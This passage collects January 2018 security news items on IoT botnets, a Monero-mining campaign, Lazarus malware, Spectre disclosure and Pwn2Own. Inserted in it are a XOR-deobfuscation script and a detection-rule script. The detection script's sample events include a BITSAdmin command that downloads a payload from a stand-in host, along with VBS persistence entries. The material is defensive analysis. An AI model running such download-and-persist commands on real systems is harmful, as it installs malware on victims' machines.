CVE-2018-1000007 was reported to cURL developers on January 18, while CVE-2018-1000005 was brought to their attention on January 10. Developers said they had not been aware of any attempts to exploit these flaws.

Various Linux distributions are also working on pushing out updates that patch the flaws.


Google Parent Alphabet Launches Cybersecurity Firm Chronicle
25.1.2018 securityweek Cyber

Google parent Alphabet on Wednesday announced a new standalone business dedicated to cybersecurity.

Called Chronicle, the newly unveiled company was born in 2016 as a project within X, Alphabet’s “moonshot” factory, with ambitions of analyzing massive amounts of data to provide security teams with insights into areas of “likely vulnerability” to help them protect their data.

“X, the moonshot factory, has been our home for the last two years while we figured out where we had the potential to make the biggest impact on this enormous problem,” Stephen Gillett, CEO of Chronicle, wrote in a blog post.

The new company, Gillett says, “will have two parts: a new cybersecurity intelligence and analytics platform that we hope can help enterprises better manage and understand their own security-related data; and VirusTotal, a malware intelligence service acquired by Google in 2012 which will continue to operate as it has for the last few years.”

“We want to 10x the speed and impact of security teams’ work by making it much easier, faster and more cost-effective for them to capture and analyze security signals that have previously been too difficult and expensive to find,” added Gillett, a former executive at Symantec, Best Buy and Starbucks. “We are building our intelligence and analytics platform to solve this problem.”

Few details have been provided, and many questions remain on exactly what Chronicle’s platform will bring to the table, and how it will be deployed in an enterprise. With that said, Google has been innovative with its own internal security tools and initiatives, and it’s likely that Chronicle’s offerings will be compelling.

In June 2017, Google shared details on the security infrastructure that protects its data centers. Late last year, Google also shared detailed information on how it protects service-to-service communications within its infrastructure at the application layer and the system it uses for data protection. The search giant also has provided technical details on how it uses a “Tiered Access” model to secure devices for its global workforce of more than 61,000 employees.

“Inspired by Google’s own security techniques, we’re advancing cybersecurity for enterprises of all sizes,” Chronicle’s website says.

Chronicle, says X’s Astro Teller, is starting “by trying to give organizations a much higher-resolution view of their security situation than they’ve ever had by combining machine learning, large amounts of computing power and large amounts of storage.”

According to Gillett, the company will have its own contracts and data policies with its customers, while also being able to tap expertise across the entire Alphabet ecosystem.


Mirai-Based Masuta Botnet Weaponizes Old Router Vulnerability
25.1.2018 securityweek BotNet 
Vulnerability

A new Internet of Things-targeting piece of malware based on Mirai’s publicly released source code has been observed at large, ensnaring devices into a botnet.

Dubbed Masuta, the botnet has at least two variants at large, and is believed to be the work of a well-known IoT threat actor, NewSky Security says. What’s also unique to the botnet is that it exploits an old router vulnerability, being the first threat known to weaponize it in a botnet campaign.

Masuta (Japanese for “master”) botnet’s source code was found on an invite-only dark web forum. The malware’s configuration file, the researchers discovered, uses a different cipher key seed than Mirai: the strings in the configuration file are XORed with 0x45.
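How an analyst recovers such a key when a variant changes it, as an added example (not NewSky Security's or the malware's code): every single-byte key is tried and the decoding that contains expected strings wins. The sample table is constructed here and encoded with the 0x45 key reported above; the crib list is an assumption about strings commonly present in Mirai-family tables.

```python
"""Single-byte XOR key recovery for a Mirai-style obfuscated string table."""
import string

# Substrings an analyst expects somewhere in a decoded Mirai-family table
# (assumption; extend to suit the sample under analysis).
CRIBS = (b"/bin/busybox", b"/proc/", b"POST ", b"GET ")
PRINTABLE = set(string.printable.encode())


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR; the same operation encodes and decodes."""
    return bytes(b ^ key for b in data)


def printable_ratio(data: bytes) -> float:
    """Share of bytes that are printable ASCII or the NUL separator."""
    return sum(b in PRINTABLE or b == 0 for b in data) / max(len(data), 1)


def score(decoded: bytes, cribs=CRIBS):
    """Number of cribs found first, printable ratio as the tie-breaker."""
    return (sum(c in decoded for c in cribs), printable_ratio(decoded))


def recover_key(blob: bytes, cribs=CRIBS) -> int:
    """Try every non-zero key byte and keep the one whose decoding scores best."""
    return max(range(1, 256), key=lambda k: score(xor_bytes(blob, k), cribs))


def decode_table(blob: bytes, key: int):
    """Decode and split a NUL-separated table into its strings."""
    return [s.decode("ascii", "replace")
            for s in xor_bytes(blob, key).split(b"\0") if s]


# Constructed sample: a few typical table entries, NUL-separated, XORed with 0x45.
SAMPLE_PLAIN = b"/bin/busybox\0/proc/self/exe\0POST /HNAP1/ HTTP/1.1\0admin\0"
SAMPLE_BLOB = xor_bytes(SAMPLE_PLAIN, 0x45)

if __name__ == "__main__":
    key = recover_key(SAMPLE_BLOB)
    print(f"recovered key: 0x{key:02x}")
    for entry in decode_table(SAMPLE_BLOB, key):
        print(" ", entry)
```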

After decoding the configuration, the researchers discovered that it uses the domain nexusiotsolutions(dot)net, the command and control (C&C) server used by Nexus Zeta, the individual involved in the recent Satori attacks. The domain was registered using the nexuszeta1337@gmail(.)com email address.

NewSky Security therefore suggests that Nexus Zeta has been involved in the creation of the Masuta botnet, in addition to building Satori, the Mirai variant that has been wreaking havoc over the past couple of months.

In fact, Masuta isn’t new either, and attacks involving it have been steadily increasing since September, and the botnet’s standard variant has been observed using several known/weak/default credentials to compromise IoT devices.

An evolved variant of Masuta, called PureMasuta, contains typical Mirai-style code and a list of weak credentials to use. What makes this variant stand out, however, is its use of the EDB 38722 D-Link exploit.

The exploit PureMasuta uses resides in HNAP (Home Network Administration Protocol), which is based on SOAP. A crafted SOAP query using hxxp://purenetworks.com/HNAP1/GetDeviceSettings can bypass authentication, and improper string handling can lead to arbitrary code execution; an attacker can chain these two issues to run code on targeted devices.

What the botnet does is to download a shell script from the C&C server and run it. Thus, the malware author first bypasses authentication and then executes code on the targeted devices.

The PureMasuta variant uses the same C&C server (93.174.93.63) as the original Masuta variant, which led the researchers to believe it is the evolved creation of the same threat actor.

“Nexus Zeta is no stranger when it comes to implementing SOAP related exploits. The threat actor has already been observed in implementing two other known SOAP related exploits, CVE-2014–8361 and CVE-2017–17215 in his Satori botnet project,” NewSky Security notes.

Thus, the TR-069 bug and EDB 38722 are the third and fourth SOAP related exploits abused by IoT botnets.

“Protocol exploits are more desirable for threat actors as they usually have a wider scope. A protocol can be implemented by various vendors/models and a bug in the protocol itself can get carried on to a wider range of devices,” the researchers conclude.


Lebanon Must Investigate Claims of Mass Spying: Rights Groups
25.1.2018 securityweek BigBrothers

Eight rights groups including Human Rights Watch called on Lebanese authorities Wednesday to investigate reports of a massive espionage campaign traced back to a government security agency.

Digital researchers last week said they had uncovered a hacking campaign using malware-infected messaging apps to steal smartphone data from people in more than 20 countries, including journalists and activists.

The report tracked the threat, which the researchers dubbed "Dark Caracal", to a building in Beirut belonging to the Lebanese General Security Directorate.

Eight rights groups and media organizations called on Lebanon's general prosecutor on Wednesday to investigate who was behind the campaign.

"If these allegations are true, this intrusive surveillance makes a mockery of people's right to privacy and jeopardises free expression and opinion," said Lama Fakih, deputy Middle East director at Human Rights Watch. "Lebanese authorities should immediately end any ongoing surveillance that violates the nation's laws or human rights, and investigate the reports of egregious privacy violations."

Other signatories included the Lebanese Center for Human Rights (CLDH), the SKeyes Center for Media and Cultural Freedom, and Lebanon's Social Media Exchange (SMEX).

Hundreds of gigabytes of data have been taken from thousands of victims in more than 21 countries, said the report, authored by digital rights group Electronic Frontier Foundation and mobile security firm Lookout.

They called Dark Caracal "one of the most prolific" mobile espionage campaigns to date. With fake versions of secure messaging services like WhatsApp and Signal, the scheme has enabled attackers to take pictures, capture audio, pinpoint locations, and mine handsets for private data.

According to the report, Dark Caracal used FinFisher, surveillance software used by governments around the world.

In 2015, Toronto-based research group Citizen Lab found that General Security and other Lebanese security forces have used FinFisher for surveillance in Lebanon.

General Security chief Abbas Ibrahim did not explicitly deny the report.

"The report is very, very, very exaggerated. We don't have these capabilities. I wish we had those abilities," he said.

In comments to the media, Interior Minister Nouhad Mashnuq also appeared to confirm there was at least some truth to the report. "It's not that it's not true, it's just very overblown," said Mashnuq.


Lawmakers Raise Questions About Disclosure of CPU Flaws
25.1.2018 securityweek
Vulnerability

The U.S. House Energy and Commerce Committee on Wednesday sent letters to several tech giants, raising questions about how the disclosure of the CPU vulnerabilities known as Spectre and Meltdown was handled.

Lawmakers have asked the CEOs of Intel, AMD, ARM, Apple, Google and Microsoft to answer a series of questions on how the disclosure of the flaws was coordinated.

Specifically, the tech giants have been asked why an embargo was imposed and who proposed it, when US-CERT and CERT/CC were notified, what the impact of the embargo on critical infrastructure and other technology companies was, what resources and best practices were used in implementing the embargo, and what lessons were learned. The targeted companies have been instructed to respond by February 7.

The Meltdown and Spectre vulnerabilities allow malicious applications to exploit weaknesses in CPU designs and bypass memory isolation mechanisms. An attacker can leverage the flaws to access data as it’s being processed, including passwords, photos, documents, and emails.

The vulnerabilities were discovered independently by researchers at Google and various universities and companies. Major vendors were first notified in June 2017 and the disclosure of the flaws was initially planned for January 9, but some experts figured out that Microsoft and Linux developers had been preparing patches for critical CPU flaws and the disclosure was moved to January 3.

The companies that were notified quickly rolled out patches after information on the Meltdown and Spectre attack methods was made public – some firms released fixes even before disclosure – but some organizations, such as Digital Ocean, were caught off guard by the news and complained about the embargo.

“While we acknowledge that critical vulnerabilities such as these create challenging trade-offs between disclosure and secrecy, as premature disclosure may give malicious actors time to exploit the vulnerabilities before mitigations are developed and deployed, we believe that this situation has shown the need for additional scrutiny regarding multi-party coordinated vulnerability disclosures,” the congressional committee wrote in its letter.

“As more products and services become connected, no one company, or even one sector, working in isolation can provide sufficient protection for their products and users,” the lawmakers added. “Today, effective responses require extensive collaboration not only between individual companies, but also across sectors traditionally siloed from one another. This reality raises serious questions about not just the embargo imposed on information regarding the Meltdown and Spectre vulnerabilities, but on embargos regarding cybersecurity vulnerabilities in general.”

While many companies have managed to quickly address the vulnerabilities, mitigations have been found to introduce performance penalties and cause systems to become unstable. Both software and microcode updates caused problems for users, and system manufacturers have decided to halt BIOS updates due to buggy patches provided by Intel.


Chrome 64 Brings Additional Mitigations for CPU Flaw
25.1.2018 securityweek
Vulnerability

Google this week released Chrome 64 in the stable channel with fixes for 53 security flaws and with additional mitigations against the web-exploitable “Spectre” CPU vulnerability.

Made public in the beginning of this year along with a bug called Meltdown, Spectre is a speculative side-channel attack technique impacting modern processors from Intel, AMD, and ARM. Putting billions of devices at risk, the two vulnerabilities have fueled an industry-wide race to release patches and mitigations.

In early December 2017, Google added Site Isolation to Chrome 63 as the first step in its attempt to mitigate these attack methods. The new Chrome release, available for Windows, Mac, and Linux as version 64.0.3282.119, brings additional mitigations against the speculative side-channel attack techniques.

The new browser iteration also includes an improved pop-up blocker, capable of preventing sites that employ abusive experiences from opening tabs or windows. Some of these deceptive tactics include masquerading links to third-party websites as play buttons or other site controls, or using transparent overlays on websites that capture all clicks and open new tabs or windows.

Site owners can check whether their websites have been found to use such abusive experiences by using the Abusive Experiences Report in Google Search Console. Thus, they can improve their user experience, Google says.

In addition to security improvements and fixes, Chrome 64 also brings some new features for developers, Google revealed in a blog post.

Of the 53 vulnerabilities that Chrome 64 patches, nearly half were discovered by external researchers, most of which are Medium and Low severity bugs.

Three High risk issues were resolved in the application: CVE-2018-6031 (Use after free in PDFium), CVE-2018-6032 (Same origin bypass in Shared Worker), and CVE-2018-6033 (Race when opening downloaded files). Google awarded the reporting researchers $3000, $2000, and $1000, respectively.

The Medium severity bugs addressed in Chrome 64 include an integer overflow issue in Blink, several insufficient isolation of devtools from extensions flaws, integer underflow in WebAssembly, insufficient user gesture requirements in autofill, heap buffer overflow in WebGL, XSS in DevTools, content security policy bypass, URL spoof issues in Navigation and OmniBox, insufficient escaping with external URL handlers, and cross origin URL leak in WebGL.

Google also resolved a referrer policy bypass bug in Blink, URL spoofing in Omnibox, UI spoof flaws in Permissions and in OmniBox, referrer leak in XSS Auditor, incomplete no-referrer policy implementation, leak of page thumbnails in New Tab Page, and use after free in WebUI vulnerabilities.

Overall, the Internet giant paid over $20,000 in bug bounties to the researchers who reported these vulnerabilities. However, the company hasn’t revealed all of the paid rewards yet.


Railway Cybersecurity Firm Cylus Emerges From Stealth
25.1.2018 securityweek Cyber

Cylus Obtains $4.7 Million in Funding to Help Protect Rail Industry Against Cyberattacks

Cylus, an Israel-based startup that specializes in cybersecurity solutions for the rail industry, emerged from stealth mode on Thursday with $4.7 million in seed funding.

Researchers have warned on several occasions in the past years that modern railway systems are vulnerable to cyberattacks, and the rail industry has been targeted by both cybercriminals and state-sponsored cyberspies.

Cylus aims to address the challenges of securing railway systems by developing a solution that is specifically designed for this sector. The product relies on a set of non-intrusive sensors that provide deep visibility into operational networks and help detect malicious activities. Customers are provided an automated assessment and instructions on how to respond when a threat is detected.


The sensors are deployed in control centers, train management systems, interlocking systems, rolling stock, and trackside components. Information collected by the sensors is fed to an on-premises server that aggregates data and generates alerts based on rules derived from machine learning algorithms and research conducted by Cylus.

A centralized dashboard provides a view of all components, and alerts users when suspicious activities are detected, including failed authentication attempts, abnormal signaling communications, and unauthorized communications between components.

In addition to step-by-step instructions on how to respond to a specific threat, Cylus’ product offers forensic analysis capabilities designed to allow railroad companies to investigate incidents.

Cylus has obtained $4.7 million in seed funding from Zohar Zisapel, Magma Venture Partners, Vertex Ventures, and the SBI Group.

“Current approaches to cybersecurity do not fit the architecture of railway networks today,” said Cylus CEO Amir Levintal. “Our team of world-class cyber specialists together with rail industry experts have tailored a solution to the industry’s unique requirements. Our solution enables rail companies to detect cyber-attacks in their operational network, including their signaling systems and rolling stocks, and block attackers before they can cause any damage. The automotive industry has woken up to the critical need for cyber protection – it’s time the railway industry got on board as well.”

Cylus told SecurityWeek that it’s currently in negotiations with several large national railways to test its product. Pricing is scalable and depends on the specific needs of each customer.

“Railway companies cannot compromise on passenger safety, and one of the pillars of passenger safety is cybersecurity,” said Boaz Zafrir, President of Cylus and former CEO of Israel Railways. “Railway executives are acutely aware of the dangers and are looking for answers. The extraordinary team at Cylus has rich experience creating effective cybersecurity solutions, and I am confident that the company's unique technology will help keep passengers safe all over the world.”


North Korea-linked Lazarus Hackers Update Arsenal of Hacking Tools
25.1.2018 securityweek BigBrothers

Recent cyberattacks associated with the North Korea-linked Lazarus group have used an evolved backdoor, along with a Remote Controller tool, Trend Micro reports.

Targeting financial institutions, the campaign employed watering hole attacks and an evolved variant of the Lazarus-linked RATANKBA Trojan, which is capable of delivering multiple payloads, including hacking tools and software targeting banking systems.

The Lazarus group has been active since at least 2009 and is believed to be backed by the North Korean government. The threat actor has targeted government, military, media, aerospace, financial and manufacturing organizations, and is believed to be the most serious threat against banks.

Servers the group used as part of the recently observed campaign for temporarily holding stolen data allowed security researchers to gain insight into attacks and victims. Thus, they discovered that around 55% of the victims were located in India and neighboring countries and that most of them didn’t use enterprise versions of Microsoft software.

In a December 2017 report, Proofpoint researchers revealed that Lazarus had started targeting individuals, and that a new Windows executable downloader and a new first-stage implant were being used in attacks.

“Less than 5% of the victims were Microsoft Windows Enterprise users, which means that currently, RATANKBA mostly affects smaller organizations or individual users, not larger organizations. It’s possible that Lazarus is using tools other than RATANKBA to target larger organizations,” Trend Micro says.

By looking at the victims’ IP addresses, the security researchers also determined that none can be associated with a large bank or a financial institution. However, victims that are likely employees of web software development companies in India and South Korea appear to have been targeted.

The hackers delivered the RATANKBA malware to their intended targets via malicious Office documents (containing topics related to software development or digital currencies), CHM files, and script downloaders. The goal of the attacks was to install the RATANKBA backdoor onto the victims’ machines to steal user information and execute commands on the system.

The hackers use a Remote Controller tool to send jobs to compromised endpoints. Through the controller, attackers queue tasks on the main server, and RATANKBA connects to this server to retrieve the tasks and execute them. This means that no real-time communication takes place between the backdoor and the attacker.

The controller provides a graphical user interface and allows the attacker to both push code to the server and download victim profiles from it.

The RATANKBA variant used in these attacks was written in PowerShell, an evolution from the original variant, which was a PE executable. The new malware iteration is more difficult to detect.

The members of the Lazarus group, Trend Micro says, appear to be native Korean speakers, “or at least have Korean language proficiency that is at the near-native level.” At least one of them is believed to also understand Chinese. The group appears interested in crypto-currencies such as Bitcoin (BTC) and Ant Share (NEO).

“Given Lazarus’ use of a wide array of tools and techniques in their operations, it’s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities. Overall, an organization will need multilayered security strategies, as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses,” the researchers conclude.


New Targets, $2 Million in Prizes Announced for Pwn2Own 2018
25.1.2018 securityweek Congress

Trend Micro’s Zero Day Initiative (ZDI) announced on Thursday that this year’s Pwn2Own hacking competition offers $2 million in cash and prizes, with several new pieces of software added to the list of targets.

Pwn2Own 2018 is scheduled to take place on March 14-16 alongside the CanSecWest conference in Vancouver, Canada. This year, ZDI has partnered with Microsoft for the event, and VMware has been announced as a sponsor.

This year’s categories are virtualization, web browsers, enterprise applications, servers, and the Windows Insider Preview challenge.

In the virtualization category, Pwn2Own 2018 introduces a new target, namely Oracle VirtualBox. Researchers can earn $35,000 and a $30,000 bonus if they can execute a privilege escalation via a Windows kernel vulnerability on the host. The base prize for VMware Workstation is $70,000 and for Microsoft Hyper-V it’s $150,000.

All major web browsers are targeted at Pwn2Own 2018. A sandbox escape can earn contestants $60,000 if it works on Chrome or Edge, $55,000 on Safari, and $40,000 on Firefox. Hackers can earn a bonus of $50,000-$70,000 if they combine their exploit with a virtual machine escape via a kernel privilege escalation vulnerability.

The targeted apps in the enterprise category are Adobe Reader, with a maximum prize of $90,000, Office 365 ProPlus, with a maximum prize of $50,000, and Microsoft Outlook, for which organizers are prepared to pay out up to $100,000. This will be the first time Outlook is a target at Pwn2Own.

In the servers category, there are no less than three new targets, including NGINX, Microsoft Windows SMB, and OpenSSL. Apache Web Server, the only target in this category in last year’s event, will remain on the list. Vulnerabilities in each of these pieces of software can earn researchers up to $100,000.

Since Microsoft is a partner of Pwn2Own 2018, it has asked ZDI to introduce a special category for some of its flagship pre-release security technologies in the latest Windows Insider Preview for Business running on Surface Book 2 devices.

Targets include Windows Defender Application Guard for Edge, Windows SMB, and the Windows Hyper-V client. Prizes range between $10,000 and $250,000.

As always, the contestant or team with the highest number of Master of Pwn points will earn 65,000 ZDI reward points, which are worth roughly $25,000. In addition, the first-round winner for each category can win a laptop.

At Pwn2Own 2017, ZDI paid out a total of $833,000 for 51 vulnerabilities, nearly double the $460,000 earned by hackers in the previous year for only 21 new flaws. Given that this year’s prize pool is $2 million, double what organizers offered last year, we can expect some interesting exploits.


30 Million Possibly Impacted in Crypto-Currency Mining Operation
25.1.2018 securityweek Virus

A large-scale crypto-currency mining operation active for over 4 months is believed to have impacted around 30 million systems worldwide, Palo Alto Networks security researchers say.

The campaign, which attempts to mine the Monero cryptocurrency using the open-source XMRig utility, has affected mainly users in South-East Asia, Northern Africa, and South America. The campaign employed VBS files and URL shortening services to install the mining tool and also used XMRig proxy services on the hosts to mask the used wallets.

Telemetry data from the Bit.ly URL shortening service suggested that at least 15 million people were impacted. However, with less than half of the identified samples using Bit.ly, the researchers speculate that the actual number of affected users could be upwards of 30 million.

The campaign employed over 250 unique Microsoft Windows PE files, over half of which were downloaded from online cloud storage provider 4sync. What the researchers couldn’t establish, however, was how the file downloads were initiated.

The attackers attempted to make their files appear both to have generic names and to originate from popular-looking file sharing services.

The Adf.ly URL shortening service that pays users when their links are clicked was also used in this campaign. When users clicked on these Adf.ly URLs, they were redirected and ended up downloading the crypto-currency mining malware instead.

The malware used in this campaign was meant to execute the XMRig mining software via VBS files and uses XMRig proxy services to hide the ultimate mining pool destination. It also uses Nicehash, a popular marketplace that allows users to trade hashing processing power (it supports various crypto-currencies and sellers are paid in Bitcoin).

Before October 20, 2017, the attackers behind this campaign were using the Windows built-in BITSAdmin tool to download the XMRig mining tool from a remote location. The final payload was mainly installed with the filename ‘msvc.exe’.

After October 20, 2017, the attackers started experimenting with HTTP redirection services, but continued using SFX files to download and deploy their malware. They also started supplementing mining queries with a username and making obfuscation attempts within the VBS files to avoid detection.

Starting on November 16, 2017, the attackers dropped the SFX files and adopted executables compiled in Microsoft .NET Framework. These would write a VBS file to disk and modify Run registry keys to achieve persistence.

In late December, the dropper was compiled with Borland Delphi and would place the VBS file in the victim’s startup folder to achieve persistence. The latest samples using this dropper also switched to a new IP address for XMRig communication, namely 5.23.48[.]207.
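The delivery and persistence techniques described in the preceding paragraphs (BITSAdmin downloads, VBS launchers, Run-key and Startup-folder persistence, the msvc.exe payload name) can be turned into endpoint detection rules. The following is an added example and not Palo Alto Networks' code; the event dictionary format and all sample events are constructed for this illustration.

```python
"""Flag the miner campaign's delivery and persistence techniques in telemetry.

Added example, not from the original report. Events are constructed dicts in
a Sysmon-like shape: {"type": "process"|"registry"|"file", ...}.
"""
import re

# Startup folder VBS drop (late-December Delphi dropper behaviour).
STARTUP_VBS_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.vbs$", re.I)
# Run key persistence (mid-November .NET dropper behaviour).
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)


def check_event(ev):
    """Return the rule names one event matches (empty list if none)."""
    kind = ev.get("type")
    image = ev.get("image", "").lower()
    cmd = ev.get("cmdline", "").lower()
    hits = []
    if kind == "process":
        # Built-in BITSAdmin used to fetch the miner from a remote location.
        if image.endswith("bitsadmin.exe") and "/transfer" in cmd and "http" in cmd:
            hits.append("bitsadmin_remote_download")
        # VBS launcher executed through the Windows script hosts.
        if image.endswith(("wscript.exe", "cscript.exe")) and ".vbs" in cmd:
            hits.append("vbs_script_execution")
        # Payload name reported for the campaign, outside the Windows directory.
        if image.endswith("\\msvc.exe") and not image.startswith("c:\\windows\\"):
            hits.append("msvc_exe_outside_windows_dir")
    elif kind == "registry":
        if RUN_KEY_RE.search(ev.get("target", "")) and ".vbs" in ev.get("data", "").lower():
            hits.append("run_key_vbs_persistence")
    elif kind == "file":
        if STARTUP_VBS_RE.search(ev.get("target", "")):
            hits.append("startup_folder_vbs")
    return hits


def scan(events):
    """Return [(event index, rule name), ...] over a list of events."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]


# Constructed sample telemetry: four malicious events and two benign ones.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer dl http://example.invalid/payload "
                r"C:\Users\u\AppData\Local\Temp\msvc.exe"},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Roaming\update.vbs"'},
    {"type": "registry",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r'wscript.exe "C:\Users\u\AppData\Roaming\update.vbs"'},
    {"type": "file",
     "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"type": "registry",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
]

if __name__ == "__main__":
    for index, rule in scan(SAMPLE_EVENTS):
        print(f"event {index}: {rule}")
```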

The campaign, researchers say, affected most countries around the world. Based on Bit.ly telemetry data, the attacks appear to have hit Thailand (3,545,437 victims), Vietnam (1,830,065), Egypt (1,132,863), Indonesia (988,163), Turkey (665,058), Peru (646,985), Algeria (614,870), Brazil (550,053), Philippines (406,294), and Venezuela (400,661) the most.

“Monero mining campaigns are certainly not a new development, as there have been various reported instances recently. However, it is less common to observe such a large-scale campaign go relatively unnoticed for such a long period of time. By targeting random end-users via malicious advertisements, using seemingly innocuous names for the malware files, and using both built-in Windows utilities and scripting files, the attackers are able to gain a foothold on victim systems at large scale,” Palo Alto concludes.


Malware in 2017 Was Full of Twists and Turns
25.1.2018 securityweek Virus

Cybercrime in 2017 was a tumultuous year "full of twists and turns", with new (but old) infection methods, a major return to social engineering, and ups and downs in ransomware.

These conclusions come from the 'Cybercrime tactics and techniques: 2017 state of malware' report (PDF) published today by Malwarebytes.

"We look at our own detection telemetry and what we find in our honeypots to see what the criminals are pushing out," Malwarebytes director of malware intelligence, Adam Kujawa, told SecurityWeek, "and we see what trends are apparent." The report covers the period of January to November 2017 and compares it to the same period for 2016.

In some cases, those trends are surprising. Ransomware figured heavily in 2017; but with nuances. Over the year, detections for consumers increased by 93% over 2016, and by 90% for businesses. But those figures disguise a decline in consumer ransomware and an increase in business ransomware over the last few months of 2017.

It's not clear why this happened, but Kujawa conjectures that improving awareness of ransomware and better defenses is making it harder for the criminals to get a good return from consumers. At the same time, while succeeding against business is even more difficult than infecting consumers, the potential return is much higher per victim. Earlier this month, Hancock Health paid $55,000 to recover from a SamSam ransomware attack.

At the same time as ransomware declined at the end of the year, "We saw," said Kujawa, "a significant increase in spyware, banking trojans, hijackers and even adware." He also pointed to a one-month dramatic spike in ransomware detections in September coinciding with an equally dramatic dip in spyware detections. "It indicates that the same type of campaign was being used to distribute both spyware and ransomware," he suggested.

For consumers, adware is now the most-detected threat -- representing around 40% of all consumer detections (it's the second most-detected threat for businesses). Anti-malware firms have been increasingly active against all forms of unwanted apps; and Malwarebytes has been in the vanguard of this. In November it won a court case brought by Enigma Software, supplier of SpyHunter, which Malwarebytes detects and blocks as unwanted software.

Concurrent with the adware market becoming more difficult, there has been a reduction in the number of players. But, commented Kujawa, "despite there being less players in the game, the attacks themselves are more sophisticated -- we see adware, something we regularly classify as a PUP, using root kit functionality to block security software from running, or just blocking the ability to remove it at all."

The report specifies Smart Service, which is bundled with adware and PUPs to prevent their removal. It hooks into the Windows CreateProcess function, so it can inspect new processes before they run. It also "protects certain processes from being terminated, and stops the user from removing critical files and registry keys."

Apart from adware, the decline in ransomware for business was replaced by an upsurge in spyware and banking trojans. For all malware, the primary tactics of infection changed from 2016 to 2017. "In 2016 we saw lots and lots of exploit kits (also in 2015)," said Kujawa. "Now suddenly spreading malware through email is popular again. It's based on tricking the user into opening something. There's less attacking the computer (exploit kits delivering malware without the user being aware) and more attacking the person (social engineering emails)."

For the consumer, the big growth malware in 2017 has been crypto-miners. Exploit kits, drive-by attacks, phishing and malicious spam attacks have all pushed miners. "We blocked one of the primary pushers of this technology, CoinHive," explained Kujawa, "and that turned out to be our #1 detection over many months. We're talking about multi-million detections per day -- averaging about 8 million per day, but I've seen it go up to 12 million and even 20 million on occasion."

One area that did not show an expected increase during 2017 was botnet activity. "The last year showed a steady decline in detections for botnet malware, a huge shift from what we saw in 2016," notes the report. "This aligns for both business and consumer customer telemetry."

There's likely little comfort in this. "Declines," adds the author, "are likely due to a shift in focus away from the desktop, aiming at IoT devices such as routers or smart appliances instead." We learned the potential for large IoT-based botnets at the end of 2016, with the Mirai attacks. "While there was a lack of massive IoT attacks in 2017, attackers have been spending their time focused on developing new tools to take advantage of IoT with cryptocurrency mining, spam-spreading botnets, and likely more DDoS attacks."

Ransomware is currently showing a downward trend. Crypto-mining may not survive the volatility in market prices (Bitcoin is currently trading at around $11,000; down from nearly $20,000 just a few weeks ago) and the likelihood of greater international cryptocurrency regulation. But Malwarebytes warns they could be replaced by something new and potentially more worrying.

"It is not farfetched," says the report, "to think we may see DDoS attacks against large organizations, like airline companies and power utilities, demanding a ransom payment to call off an army of botnet-infected IoT devices." Ransomware might decline, merely to be replaced by larger DDoS ransoms.


"Hide 'N Seek" IoT Botnet Ensnares 20,000 Devices in Days
25.1.2018 securityweek IoT  BotNet

An Internet of Things (IoT) botnet featuring a worm-like spreading mechanism managed to ensnare over 20,000 devices over the course of several days, Bitdefender reports.

Dubbed Hide ‘N Seek, the botnet was first spotted on January 10, when it focused on IP cameras manufactured by a Korean company, but vanished just days after. On January 20, however, the researchers observed a new, improved variant of the malware, which has ensnared more than 20,000 devices worldwide and continues to spread quickly.

The malware was designed to exfiltrate data, execute code, and interfere with the device operation. Employing a complex and decentralized communication technique and multiple anti-tampering methods to prevent hijacking, the botnet uses the same exploit as Reaper (CVE-2016-10401 and other vulnerabilities), Bitdefender says.

The bot’s worm-like spreading mechanism consists of randomly generating a list of IP addresses to target, and then initiating a raw socket SYN connection to each host on specific destination ports (23, 2323, 80, and 8080). After establishing a connection, the bot first looks for a specific banner (“buildroot login:”) and attempts to log in via predefined credentials, or launches a dictionary attack if that fails.

Next, the malware attempts to properly identify the target device and select a compromise method, such as setting up a TFTP server if the target is on the same LAN, or a remote payload delivery method if the target is on the Internet.

These pre-configured exploitation techniques are located in a digitally signed memory location to prevent tampering and can be updated remotely and propagated among infected hosts. Targeting IoT devices, the botnet can’t achieve persistence, meaning that a device reboot would clear up the infection.

After Hajime, Hide ‘N Seek becomes the second known IoT botnet to use a decentralized, peer-to-peer architecture. The difference is that, while Hajime used p2p functionality based on the BitTorrent protocol, the new botnet uses a custom-built p2p communication mechanism.

“The bot opens a random port on the victim, and adds firewall rules to allow inbound traffic for the port. It then listens for connections on the open port and only accepts the specific commands described below,” Bitdefender Senior Threat Analyst Bogdan Botezatu explains.

To prevent infiltration or poisoning attempts, the malware uses an elliptic curve key within the file used to authenticate the command for updating the memory zone where configuration settings are stored.

The bot includes support for multiple commands for configuration updates, a data exfiltration mechanism, and a scanning component (which sends to a peer valid credentials found via dictionary attack). It also supports commands to add a new peer to the list and send a peer IP as a response.

“While IoT botnets have been around for years, mainly used for DDoS attacks, the discoveries made during the investigation of the Hide and Seek bot reveal greater levels of complexity and novel capabilities such as information theft – potentially suitable for espionage or extortion. It is also worth noting that the botnet is undergoing constant redesign and rapid expansion,” Botezatu concludes.

A recent NETSCOUT Arbor report on distributed denial of service attacks has revealed that compromised IoT devices can fuel new, complex assaults. The emergence of new IoT botnets such as Masuta or Satori has proved once again the need for improved security for Internet-connected devices.

“As IoT devices become increasingly popular in our modern lives, they also become more attractive to cybercriminals. In fact, in 2017 we recorded a record number of IoT vulnerabilities, with them more than doubling since 2016,” Nadav Avital, security research team leader at Imperva, told SecurityWeek in an emailed statement.

“This [Bitdefender] research also emphasizes the need for an account takeover solution which protects all devices with a network presence. Account takeover is a big problem, however it is not something which IoT vendors provide protection for. It is therefore a good idea for organizations to deploy an external solution for security,” Avital concluded.


